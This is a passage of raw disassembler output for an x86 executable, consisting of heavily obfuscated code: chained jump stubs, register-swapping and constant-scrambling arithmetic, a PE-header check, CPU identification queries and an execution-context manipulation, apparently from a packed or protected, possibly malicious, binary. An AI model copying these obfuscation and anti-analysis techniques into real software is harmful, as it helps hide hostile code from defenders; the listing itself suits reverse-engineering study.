loc_42C84B: ; CODE XREF: sub_42616B:loc_424058�j
add edx, 1B6EBACBh
xchg edx, [esp+0]
jmp loc_42E599
; END OF FUNCTION CHUNK FOR sub_42616B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424E42
loc_42C859: ; CODE XREF: sub_424E42:loc_42ABC4�j
add edi, 6D4B9877h
xor edi, 1ECFF3CDh
call sub_4295A2
; END OF FUNCTION CHUNK FOR sub_424E42
; START OF FUNCTION CHUNK FOR sub_428A03
loc_42C86A: ; CODE XREF: sub_428A03+2A15�j
jmp sub_42A94C
; END OF FUNCTION CHUNK FOR sub_428A03
; ---------------------------------------------------------------------------
loc_42C86F: ; CODE XREF: _7hdaygc1:0042AE45�j
jmp loc_428C7B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429A26
loc_42C874: ; CODE XREF: sub_429A26+E�j
jmp loc_42E648
; END OF FUNCTION CHUNK FOR sub_429A26
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4268BD
loc_42C879: ; CODE XREF: sub_4268BD+10�j
jmp loc_424BB7
; END OF FUNCTION CHUNK FOR sub_4268BD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F8C4
loc_42C87E: ; CODE XREF: sub_42F8C4-C4E0�j
jmp loc_42A739
; END OF FUNCTION CHUNK FOR sub_42F8C4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_42. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42C884: ; CODE XREF: _7hdaygc1:0042A93B�j
; _7hdaygc1:0042F6FF�j
jmp loc_42A30F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424680
loc_42C889: ; CODE XREF: sub_424680+1B24�j
jmp loc_428BA9
; END OF FUNCTION CHUNK FOR sub_424680
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F65A
loc_42C88E: ; CODE XREF: sub_42F65A-6ADA�j
xchg ebp, [esp+0]
mov eax, ebp
pop ebp
add eax, 0EF34EE91h
xor eax, 0AF476082h
rol eax, 1Ah
add eax, 0E8CF0569h
jmp loc_42A787
; END OF FUNCTION CHUNK FOR sub_42F65A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D84A
loc_42C8AE: ; CODE XREF: sub_42D84A:loc_42A67C�j
adc esi, 0B1015CE8h
xchg esi, [ecx]
loc_42C8B6: ; CODE XREF: sub_42D84A:loc_428321�j
push esi
call sub_426A39
loc_42C8BC: ; CODE XREF: sub_42BB83-61F7�j
jmp loc_42E3DA
; END OF FUNCTION CHUNK FOR sub_42D84A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4236EA
loc_42C8C1: ; CODE XREF: sub_4236EA+5�j
jmp loc_42CA5A
; END OF FUNCTION CHUNK FOR sub_4236EA
; ---------------------------------------------------------------------------
jg loc_426A10
jmp loc_42AA45
; ---------------------------------------------------------------------------
loc_42C8D1: ; CODE XREF: _7hdaygc1:0042AC1D�j
and eax, 0FFFh
add [esi], eax
push edi
mov edi, ebx
jmp loc_42F04E
; ---------------------------------------------------------------------------
loc_42C8E0: ; DATA XREF: sub_424AE1+3886�o
xchg eax, [esp]
mov ecx, eax
pop eax
push offset loc_425486
jmp loc_429FDB
; ---------------------------------------------------------------------------
loc_42C8F0: ; CODE XREF: _7hdaygc1:0042C5D5�j
mov esi, 733CEF05h
js loc_42BADC
loc_42C8FB: ; CODE XREF: _7hdaygc1:loc_42E03C�j
push 0C69924E3h
or eax, 87EF809Ah
jmp loc_424794
; ---------------------------------------------------------------------------
and ebp, ebx
jmp sub_42E41D
; ---------------------------------------------------------------------------
loc_42C912: ; DATA XREF: sub_42BEC6:loc_42D5C3�o
mov [ecx], eax
pop ecx
lea eax, [ebp-8]
push eax
push esi
call sub_423812
; START OF FUNCTION CHUNK FOR sub_428B5B
loc_42C91F: ; CODE XREF: sub_428B5B:loc_42DC1F�j
jnz sub_426EBD
jmp loc_42B2F6
; END OF FUNCTION CHUNK FOR sub_428B5B
; =============== S U B R O U T I N E =======================================
sub_42C92A proc near ; DATA XREF: _7hdaygc1:0042ADE0�o
xchg edi, [esp+0]
jmp sub_42AA07
sub_42C92A endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426130
loc_42C933: ; CODE XREF: sub_426130:loc_425D7A�j
; sub_42F4CE+6�j
call sub_4242E0
; END OF FUNCTION CHUNK FOR sub_426130
; START OF FUNCTION CHUNK FOR sub_42A833
loc_42C938: ; CODE XREF: sub_42A833+F�j
jz loc_423004
jmp loc_42609D
; END OF FUNCTION CHUNK FOR sub_42A833
; ---------------------------------------------------------------------------
loc_42C943: ; CODE XREF: _7hdaygc1:0042F883�j
jnz loc_42ED59
jmp loc_42EA07
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42936E
loc_42C94E: ; CODE XREF: sub_42936E+6738�j
mov edx, [edx]
push edx
push edx
mov edx, ebx
xchg edx, [esp+8+var_8]
jmp loc_4296E3
; END OF FUNCTION CHUNK FOR sub_42936E
; ---------------------------------------------------------------------------
loc_42C95C: ; CODE XREF: _7hdaygc1:0042B7E4�j
sub ecx, 0A3DABF7Eh
; START OF FUNCTION CHUNK FOR sub_42FCD3
loc_42C962: ; CODE XREF: sub_42FCD3:loc_42B7CD�j
add ecx, 910B8F5Eh
xchg ecx, [esp+0]
jmp loc_42F926
; END OF FUNCTION CHUNK FOR sub_42FCD3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EF91
loc_42C970: ; CODE XREF: sub_42EF91:loc_42F9B7�j
pop edi
rol edi, 16h
sub edi, ds:4000F0h
xor edi, 849CA48Dh
jnz loc_42A140
loc_42C986: ; CODE XREF: sub_4289CE-3F61�j
jmp nullsub_145
; END OF FUNCTION CHUNK FOR sub_42EF91
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4242E0
loc_42C98B: ; CODE XREF: sub_4242E0+A�j
jmp loc_429C9C
; END OF FUNCTION CHUNK FOR sub_4242E0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_42C990: ; CODE XREF: sub_4291EA-1F31�j
jz loc_42C2CC
jmp loc_429DD6
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A2B
loc_42C99B: ; CODE XREF: sub_424A2B:loc_42C2F0�j
; _7hdaygc1:0042C304�j
or ecx, ds:4000F6h
add ecx, 1448327Eh
xchg ecx, [esp+4+var_4]
jmp sub_424DF3
; END OF FUNCTION CHUNK FOR sub_424A2B
; ---------------------------------------------------------------------------
xchg ecx, esi
jmp sub_42F4CE
; ---------------------------------------------------------------------------
loc_42C9B6: ; CODE XREF: _7hdaygc1:0042A602�j
jo loc_42B8FE
; START OF FUNCTION CHUNK FOR sub_42C443
loc_42C9BC: ; CODE XREF: sub_42C443-8521�j
xor ecx, 53847060h
rol ecx, 1Eh
add ecx, 8A322D64h
jmp loc_42C394
; END OF FUNCTION CHUNK FOR sub_42C443
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AA8
loc_42C9D0: ; CODE XREF: sub_424AA8+64C0�j
; _7hdaygc1:0042C1F8�j
rol eax, 15h
loc_42C9D3: ; CODE XREF: _7hdaygc1:0042F284�j
push ebx
push eax
pop ebx
xchg ebx, [esp+4+var_4]
push offset sub_428C26
jmp nullsub_206
; END OF FUNCTION CHUNK FOR sub_424AA8
; ---------------------------------------------------------------------------
cmp edx, eax
jmp loc_42C677
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_42C9EA: ; CODE XREF: sub_42C16F-3907�j
mov eax, [eax]
mov eax, [eax]
shl eax, 0Fh
mov edx, [ebp-4]
add [edx], eax
pop ecx
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4270E6
loc_42C9F9: ; CODE XREF: sub_4270E6:loc_42C310�j
; _7hdaygc1:0042D78B�j
jmp sub_42B650
; END OF FUNCTION CHUNK FOR sub_4270E6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA07
loc_42C9FE: ; CODE XREF: sub_42AA07-38AF�j
jmp nullsub_50
; END OF FUNCTION CHUNK FOR sub_42AA07
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C405
loc_42CA03: ; CODE XREF: sub_42C405+1�j
mov ebx, ebp
call sub_42CCDD
loc_42CA0A: ; CODE XREF: _7hdaygc1:0042EA02�j
jmp nullsub_150
; END OF FUNCTION CHUNK FOR sub_42C405
; ---------------------------------------------------------------------------
mov edx, 95918C9Dh
call sub_4241F3
loc_42CA19: ; CODE XREF: _7hdaygc1:00428EAC�j
jmp loc_42AE1D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D30E
loc_42CA1E: ; CODE XREF: sub_42D30E-7C6E�j
jmp loc_4283BA
; END OF FUNCTION CHUNK FOR sub_42D30E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4254BE
loc_42CA23: ; CODE XREF: sub_4254BE+9�j
jmp loc_428108
; END OF FUNCTION CHUNK FOR sub_4254BE
; =============== S U B R O U T I N E =======================================
sub_42CA28 proc near ; DATA XREF: _7hdaygc1:0042E2FE�o
cmp dword ptr [eax-4], 4
jnz loc_42CA3B
add dword ptr [ebp-8], 4
jmp loc_42BC99
; ---------------------------------------------------------------------------
loc_42CA3B: ; CODE XREF: sub_42CA28+4�j
push offset sub_42F7B5
jmp loc_428452
sub_42CA28 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423648
loc_42CA45: ; CODE XREF: sub_423648:loc_42CADC�j
shl eax, 8
mov edx, [ebp-20h]
call sub_42D0FB
loc_42CA50: ; CODE XREF: sub_42F467-C35�j
jmp loc_42B23F
; END OF FUNCTION CHUNK FOR sub_423648
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BEDA
loc_42CA55: ; CODE XREF: sub_42BEDA+7�j
jmp loc_42BC02
; END OF FUNCTION CHUNK FOR sub_42BEDA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4236EA
loc_42CA5A: ; CODE XREF: sub_4236EA:loc_42C8C1�j
push ecx
mov ecx, [esp+4+arg_8]
mov dword ptr [ecx], 10001h
lea eax, loc_4297A0
mov [ecx+0B8h], eax
pop ecx
xor eax, eax
jmp loc_42F049
; END OF FUNCTION CHUNK FOR sub_4236EA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E51C
loc_42CA79: ; CODE XREF: sub_42E51C+1570�j
push offset sub_42E1F1
jmp loc_42498B
; END OF FUNCTION CHUNK FOR sub_42E51C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A92E
loc_42CA83: ; CODE XREF: sub_42A92E:loc_42322F�j
ror eax, 4
call sub_428BDA
loc_42CA8B: ; CODE XREF: _7hdaygc1:0042DE57�j
jmp loc_4271C2
; END OF FUNCTION CHUNK FOR sub_42A92E
; ---------------------------------------------------------------------------
loc_42CA90: ; CODE XREF: _7hdaygc1:0042AAFA�j
jmp locret_42505A
; ---------------------------------------------------------------------------
loc_42CA95: ; DATA XREF: sub_42AFFE-6C84�o
popf
xchg esi, [esp]
jmp loc_42BF69
; ---------------------------------------------------------------------------
loc_42CA9E: ; CODE XREF: _7hdaygc1:00427E16�j
or edx, 15D9F8CCh
xor edx, 1596B02Dh
call sub_425B78
; START OF FUNCTION CHUNK FOR sub_42986C
loc_42CAAF: ; CODE XREF: sub_42986C+13�j
jmp loc_429F52
; END OF FUNCTION CHUNK FOR sub_42986C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DDF5
loc_42CAB4: ; CODE XREF: sub_42DDF5:loc_42BC7D�j
pop edi
and edi, 0F2D7A9h
xor edi, 0B9D1D773h
rol edi, 1Eh
sub edi, 3D358323h
add edi, 8EFAE805h
mov [edi], eax
call sub_42B8F8
; END OF FUNCTION CHUNK FOR sub_42DDF5
; START OF FUNCTION CHUNK FOR sub_423172
loc_42CAD7: ; CODE XREF: sub_423172+5288�j
jmp loc_429BC9
; END OF FUNCTION CHUNK FOR sub_423172
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423648
loc_42CADC: ; CODE XREF: sub_423648+DAA�j
jmp loc_42CA45
; END OF FUNCTION CHUNK FOR sub_423648
; =============== S U B R O U T I N E =======================================
sub_42CAE1 proc near ; CODE XREF: sub_42DAE8+5�p
; _7hdaygc1:0042E8FE�j
xchg edx, [esp+0]
pop edx
push 0FF5BB26Bh
pop eax
xor eax, 4B3BF014h
jmp loc_42CBD7
sub_42CAE1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42CAF6: ; CODE XREF: _7hdaygc1:0042B1DE�j
jnz loc_429820
loc_42CAFC: ; CODE XREF: _7hdaygc1:loc_423239�j
push offset loc_429CE7
jmp locret_423F7E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E283
loc_42CB06: ; CODE XREF: sub_42E283-1C4�j
sbb ecx, edi
loc_42CB08: ; CODE XREF: _7hdaygc1:00429DEC�j
xor esi, eax
jmp loc_42DD90
; END OF FUNCTION CHUNK FOR sub_42E283
; =============== S U B R O U T I N E =======================================
sub_42CB0F proc near ; CODE XREF: _7hdaygc1:00426381�j
; sub_42DC52+6�p
xchg eax, [esp+0]
loc_42CB12: ; CODE XREF: _7hdaygc1:004247D1�j
pop eax
add eax, 0D4FE2045h
push ebx
jmp loc_42E1EC
sub_42CB0F endp
; ---------------------------------------------------------------------------
push ebx
push 0B09A7A66h
pop ebx
and ebx, 9584A561h
xor ebx, 90802060h
xchg ebx, [esp]
jmp loc_4288EE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B78
loc_42CB3A: ; CODE XREF: sub_425B78+F�j
push eax
ror eax, 12h
jmp loc_4281BF
; END OF FUNCTION CHUNK FOR sub_425B78
; ---------------------------------------------------------------------------
loc_42CB43: ; CODE XREF: _7hdaygc1:loc_426917�j
push ecx
mov ecx, ebp
xchg ecx, [esp]
mov ebp, esp
push ecx
mov esp, ebp
jmp loc_42F9C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429532
loc_42CB53: ; CODE XREF: sub_429532:loc_42B700�j
mov eax, [ebp-4]
cmp byte ptr [eax], 0CFh
jz loc_4236DB
mov eax, [ebp-4]
jmp loc_4247FF
; ---------------------------------------------------------------------------
loc_42CB67: ; CODE XREF: sub_429532:loc_429538�j
mov eax, [ebp-4]
movzx eax, byte ptr [eax]
jmp loc_42685C
; END OF FUNCTION CHUNK FOR sub_429532
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F152
loc_42CB72: ; CODE XREF: sub_42F152:loc_4292E5�j
popf
and edx, 0F4786D2Fh
pop esi
adc ecx, 0D623105Fh
jmp loc_425E30
; END OF FUNCTION CHUNK FOR sub_42F152
; =============== S U B R O U T I N E =======================================
sub_42CB85 proc near ; CODE XREF: sub_42D30E+17B6�p
; FUNCTION CHUNK AT 0042D27C SIZE 0000000B BYTES
xchg edi, [esp+0]
pop edi
pop edi
mov eax, [eax]
call sub_427EF6
loc_42CB91: ; CODE XREF: sub_426D30+4�j
jmp loc_42D27C
sub_42CB85 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426B62
loc_42CB96: ; CODE XREF: sub_426B62+19�j
jmp sub_42B470
; END OF FUNCTION CHUNK FOR sub_426B62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425A37
loc_42CB9B: ; CODE XREF: sub_425A37-470�j
jge loc_42A017
adc edi, 0A12CF5AFh
loc_42CBA7: ; CODE XREF: sub_425A37:loc_4255B0�j
rol ebx, 16h
cmp ebx, 0C466654Ch
jmp loc_42BA05
; END OF FUNCTION CHUNK FOR sub_425A37
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A052
loc_42CBB5: ; CODE XREF: sub_42A052-5E5�j
add edi, 6264C5B8h
xchg edi, [esp+4+var_4]
jmp loc_42DB87
; END OF FUNCTION CHUNK FOR sub_42A052
; ---------------------------------------------------------------------------
mov [eax], esi
; =============== S U B R O U T I N E =======================================
sub_42CBC5 proc near ; CODE XREF: sub_42DDF5:loc_427105�p
arg_0 = dword ptr 4
xchg edi, [esp+0]
pop edi
xchg edx, [esp-4+arg_0]
jmp sub_42A94C
sub_42CBC5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B20
loc_42CBD1: ; CODE XREF: sub_423B20:loc_424D19�j
jnz loc_42872F
loc_42CBD7: ; CODE XREF: sub_42CAE1+10�j
jmp loc_42EC61
; END OF FUNCTION CHUNK FOR sub_423B20
; ---------------------------------------------------------------------------
jo loc_42A439
add edx, eax
jmp loc_428727
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_142. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A62
loc_42CBEA: ; CODE XREF: sub_426A62+13�j
cmp ds:dword_42BC60, 0
jnz loc_42E978
jmp loc_426F6C
; END OF FUNCTION CHUNK FOR sub_426A62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A2EF
loc_42CBFC: ; CODE XREF: sub_42A2EF:loc_42A522�j
jbe loc_4262E0
and ecx, 3D8A1A81h
not edx
jmp loc_4294C0
; END OF FUNCTION CHUNK FOR sub_42A2EF
; ---------------------------------------------------------------------------
loc_42CC0F: ; DATA XREF: sub_42F0B4-33D4�o
jno loc_4248BE
add esp, 0FFFFFFF0h
mov [ebp-0Ch], ecx
mov [ebp-8], edx
jmp loc_4248AC
; ---------------------------------------------------------------------------
loc_42CC23: ; CODE XREF: _7hdaygc1:loc_426C9D�j
mov ecx, [ecx]
xchg ecx, [esp]
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42911B
loc_42CC29: ; CODE XREF: sub_42911B+6�j
mov ebp, esp
push edx
push 27C172B7h
jmp loc_42DE34
; END OF FUNCTION CHUNK FOR sub_42911B
; ---------------------------------------------------------------------------
loc_42CC36: ; DATA XREF: sub_42A94C+5449�o
cmp dword ptr [ebp-0Ch], 0
jle loc_42B068
jmp loc_426991
; =============== S U B R O U T I N E =======================================
sub_42CC45 proc near ; CODE XREF: sub_42A94C+3�j
; FUNCTION CHUNK AT 0042EA5D SIZE 0000000D BYTES
add esp, 0FFFFFFF4h
mov [ebp-0Ch], ecx
mov [ebp-8], edx
jmp loc_42EA5D
sub_42CC45 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B32F
loc_42CC53: ; CODE XREF: sub_42B32F:loc_42DE25�j
push offset sub_427E1C
jmp nullsub_74
; END OF FUNCTION CHUNK FOR sub_42B32F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F8DB
loc_42CC5D: ; CODE XREF: sub_42F8DB:loc_42A797�j
xor [esi], edx
mov eax, 80000004h
xor ebx, ebx
xor ecx, ecx
xor edx, edx
cpuid
push offset loc_42A387
jmp nullsub_141
; END OF FUNCTION CHUNK FOR sub_42F8DB
; =============== S U B R O U T I N E =======================================
sub_42CC76 proc near ; DATA XREF: sub_424963+743B�o
; FUNCTION CHUNK AT 00424D96 SIZE 00000005 BYTES
mov eax, [eax+24h]
add eax, [ebp-4]
xor edx, edx
push edx
push eax
mov eax, [ebp-18h]
jmp loc_424D96
sub_42CC76 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424963
loc_42CC88: ; CODE XREF: sub_424963+B�j
add eax, [esp-4+arg_0]
adc edx, [esp-4+arg_4]
jmp loc_425546
; END OF FUNCTION CHUNK FOR sub_424963
; ---------------------------------------------------------------------------
rol ecx, 2
jmp sub_425FCB
; ---------------------------------------------------------------------------
loc_42CC9C: ; CODE XREF: _7hdaygc1:004282A3�j
adc esi, 60F1DAE8h
jmp loc_42F23A
; ---------------------------------------------------------------------------
loc_42CCA7: ; CODE XREF: _7hdaygc1:0042E3FD�j
xor edi, esi
loc_42CCA9: ; CODE XREF: _7hdaygc1:loc_425F10�j
mov eax, 80000002h
xor ebx, ebx
call sub_427248
loc_42CCB5: ; CODE XREF: _7hdaygc1:loc_42404E�j
jz loc_428DA3
jmp loc_42549D
; ---------------------------------------------------------------------------
inc dword ptr [ebp-8]
cmp dword ptr [ebp-8], 3
jnz loc_426588
jmp loc_429BE2
; ---------------------------------------------------------------------------
sub ecx, 37E2BF68h
jmp loc_424CDA
; =============== S U B R O U T I N E =======================================
sub_42CCDD proc near ; CODE XREF: _7hdaygc1:00423072�j
; sub_42C405+600�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004262AF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426CB6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429380 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429AE8 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042B2F1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B720 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042DA37 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042F2AC SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042FD3D SIZE 00000009 BYTES
xchg eax, [esp+0]
pop eax
xchg ebx, [esp-4+arg_0]
mov ebp, esp
push ecx
jmp loc_426CB6
sub_42CCDD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425A37
loc_42CCEC: ; CODE XREF: sub_425A37:loc_42BA0B�j
xchg edi, [esp+0]
mov ebp, esp
push edi
mov edi, ecx
push offset loc_42AE7E
jmp nullsub_52
; END OF FUNCTION CHUNK FOR sub_425A37
; =============== S U B R O U T I N E =======================================
sub_42CCFE proc near ; DATA XREF: sub_42D287:loc_425D50�o
; FUNCTION CHUNK AT 0042818B SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00428F2B SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042D82D SIZE 00000005 BYTES
mov [ebp-20h], eax
mov eax, [ebp-20h]
mov [ebp-28h], eax
mov dword ptr [ebp-14h], 4
mov eax, [ebp-14h]
mov [ebp-4], eax
jmp loc_42D82D
sub_42CCFE endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C50D
loc_42CD19: ; CODE XREF: sub_42C50D-1C1�j
js loc_42E086
; END OF FUNCTION CHUNK FOR sub_42C50D
; =============== S U B R O U T I N E =======================================
sub_42CD1F proc near ; CODE XREF: sub_42B265-C46�p
xchg esi, [esp+0]
pop esi
mov [ebx], eax
pop ebx
mov eax, [ebp-4]
cmp dword ptr [eax], 4550h
jmp loc_429D16
sub_42CD1F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C443
loc_42CD34: ; CODE XREF: sub_42C443:loc_42ABF0�j
ja loc_424551
jmp loc_4293C4
; END OF FUNCTION CHUNK FOR sub_42C443
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F7E6
loc_42CD3F: ; CODE XREF: sub_42F7E6:loc_42CD85�j
push offset loc_423433
jmp nullsub_139
; END OF FUNCTION CHUNK FOR sub_42F7E6
; ---------------------------------------------------------------------------
loc_42CD49: ; CODE XREF: _7hdaygc1:0042C82E�j
jnz loc_42A25C
pushf
loc_42CD50: ; CODE XREF: _7hdaygc1:loc_4287F5�j
mov edx, [ebp-4]
lea eax, [ebp-0Ch]
push 0C737B222h
pop ecx
rol ecx, 18h
xor ecx, 4A9B6C73h
jmp loc_42E279
; ---------------------------------------------------------------------------
loc_42CD6A: ; CODE XREF: _7hdaygc1:00424536�j
or ecx, 53633075h
loc_42CD70: ; CODE XREF: _7hdaygc1:loc_42452A�j
and ecx, 6C1E5791h
add ecx, 0F8287BD9h
xchg ecx, [esp]
jmp loc_428E32
; ---------------------------------------------------------------------------
locret_42CD84: ; CODE XREF: _7hdaygc1:004261B7�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F7E6
loc_42CD85: ; CODE XREF: sub_42F7E6+7�j
jmp loc_42CD3F
; END OF FUNCTION CHUNK FOR sub_42F7E6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EF91
loc_42CD8A: ; CODE XREF: sub_42EF91-2131�j
jmp loc_42B234
; END OF FUNCTION CHUNK FOR sub_42EF91
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425F27
loc_42CD8F: ; CODE XREF: sub_425F27-A52�j
jmp sub_4252F5
; END OF FUNCTION CHUNK FOR sub_425F27
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F3C8
loc_42CD94: ; CODE XREF: sub_42F3C8:loc_42FBB1�j
push ecx
push ecx
mov ecx, eax
xchg ecx, [esp+0Ch+var_C]
push esi
pop eax
xchg eax, [esp+0Ch+var_C]
jmp loc_42DA65
; END OF FUNCTION CHUNK FOR sub_42F3C8
; ---------------------------------------------------------------------------
mov eax, ds:dword_423B1C
push eax
push 2D5E9C0Bh
pop eax
jmp loc_42C7B8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427EF6
loc_42CDB6: ; CODE XREF: sub_427EF6-37D5�j
shl ebp, 1Ah
and edx, ebx
and esi, eax
jmp loc_427FC1
; END OF FUNCTION CHUNK FOR sub_427EF6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C443
loc_42CDC2: ; CODE XREF: sub_42C443+B41�j
jnp loc_42FA52
jnz nullsub_121
jmp loc_426245
; END OF FUNCTION CHUNK FOR sub_42C443
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A693
loc_42CDD3: ; CODE XREF: sub_42A693+6�j
pop esi
; END OF FUNCTION CHUNK FOR sub_42A693
; START OF FUNCTION CHUNK FOR sub_42D9E1
loc_42CDD4: ; CODE XREF: sub_42D9E1:loc_4280D6�j
xor edx, edx
mov edx, ds:dword_42BC60
lea eax, [edx+eax*4]
jmp loc_42B2EC
; END OF FUNCTION CHUNK FOR sub_42D9E1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42826A
loc_42CDE4: ; CODE XREF: sub_42826A:loc_4296A2�j
pop ecx
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_42826A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C50D
loc_42CDE7: ; CODE XREF: sub_42C50D-8DD�j
jmp loc_42FD87
; END OF FUNCTION CHUNK FOR sub_42C50D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DFC
loc_42CDEC: ; CODE XREF: sub_42E076+A�j
; sub_423DFC+A815�j
push 0D9C5C875h
pop eax
jmp loc_4231C1
; END OF FUNCTION CHUNK FOR sub_423DFC
; =============== S U B R O U T I N E =======================================
sub_42CDF7 proc near ; DATA XREF: sub_42837F-20A9�o
; FUNCTION CHUNK AT 004240E3 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00424410 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424431 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424C5A SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042AD4C SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042BCB6 SIZE 00000028 BYTES
; FUNCTION CHUNK AT 0042C04A SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0042D96C SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042EEAC SIZE 0000000B BYTES
pop ebp
mov eax, ds:dword_425158
or eax, eax
call sub_42E41D
loc_42CE05: ; CODE XREF: _7hdaygc1:0042A25E�j
call sub_428C3B
push 687DF4ABh
pop edx
or edx, 99E4D73Ah
jmp loc_424431
sub_42CDF7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C7F3
loc_42CE1B: ; CODE XREF: sub_42C7F3-6794�j
pop ecx
add ecx, 109C6C68h
rol ecx, 2
xor ecx, 0CCA4A377h
sub ecx, 57553ABBh
xor ecx, 0F1C2C111h
add eax, ecx
pop ecx
jmp loc_429203
; END OF FUNCTION CHUNK FOR sub_42C7F3
; ---------------------------------------------------------------------------
loc_42CE3F: ; DATA XREF: sub_4252C8:loc_425BC1�o
or [edx-8], eax
; START OF FUNCTION CHUNK FOR sub_4246D7
loc_42CE42: ; CODE XREF: sub_4246D7+8FE9�j
; sub_4246D7+8FF2�j ...
jnb loc_424DD9
cmp dword ptr [ebp-14h], 4
jnz loc_42F411
mov eax, [ebp+8]
jmp loc_4286AD
; END OF FUNCTION CHUNK FOR sub_4246D7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EF91
loc_42CE5A: ; CODE XREF: sub_42EF91:loc_427E3F�j
jnz loc_424D79
jmp loc_42CD8A
; END OF FUNCTION CHUNK FOR sub_42EF91
; ---------------------------------------------------------------------------
mov ecx, [edi]
jmp loc_42DD71
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F02
loc_42CE6C: ; CODE XREF: sub_423F02:loc_42311E�j
jnp loc_428B89
